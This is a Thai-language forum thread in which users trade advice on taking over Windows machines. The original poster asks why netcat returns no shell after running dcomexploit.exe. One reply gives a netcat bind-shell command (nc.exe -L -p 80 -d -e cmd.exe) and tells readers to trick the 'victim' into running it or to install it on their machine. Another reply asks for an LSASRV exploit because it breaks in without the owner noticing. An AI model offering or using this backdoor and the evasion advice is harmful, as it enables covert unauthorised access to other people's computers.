ทำไงให้ netcat ให้มันโยน cmd กลับมาครับ

[naratipb]

ผมลองใช้ dcomexploit.exe ในเครื่องที่มีช่องโหว่แต่พอมันบอกให้ ใช้ netcat connect ที่ port 4444 ของเครื่องเป้าหมายพอ ใช้คำสั่งคือ nc xxx.xxx.xxx.xxx 4444 แล้วมันไม่ให้ cmd เครื่องเป้าหมายมา ต้องทำยังไงครับ

[bomtelecom]

XP Sp1 Sp2 ก็ใช้ไม่ได้แล้วครับ ทาง microsoft ได้อุดช่องโหว่แล้ว

[Karun]

งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน

โดยให้ที่เครื่องเหยื่อ ใช้ netcat แบบนี้ครับ (หาวิธีหลอกล่อหรือติดตั้งเอาเอง)


nc.exe -L -p 80 -d -e cmd.exe

-L คือให้ listen ที่พอร์ต -p 80 ตลอดเวลา (แอลตัวใหญ่)

ส่วน -d -e cmd.exe คือให้ redirect application ไปที่ cmd ครับผม

ลองไปใช้ดูนะครับ

[Karun]

งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน

[sonteen]

ผมว่าถ้าเราใช้ nc เปิด port อะไรซักอันอันทิ้งไว้รอการ connect จากเราแล้วเรา connect เข้าไปทาง port ที่เราเปิดไว้อะคับน่าจะได้ เคยทำบนลีนุก แต่วินโดว์ไม่เคย ว่าแต่ผมเข้าใจอะไรผิดป่าวเนี่ย

[blshuta]

จริงๆก็มีโปรแกรมอีกตัวที่ชื่อ LSASRV_04011 ตัวนั้นก็ไว้เปิดช่องโหว่ของ lsasrv.dll แล้วค่อยให้มันรับportที่เราระบุไว้ แต่ตอนนี้ผมหาไม่ได้แระ ใครมีก็รบกวนลงให้ด้วยนะครับ^^

P$. ตัวนี้มันจาไม่เหมือนdcomก้คือ ถ้าเราใช้dcomเนี่ย เจ้าตัวจะรู้แน่ๆว่าโดนเจาะ เพราะคอมมันจาทำการรีเครื่องแบบบังคับอ้ะ แต่ถ้าใช้lsasrvมันจาเงียบๆไปเลย ไม่มีสิ่งผิดปกติอ่า^^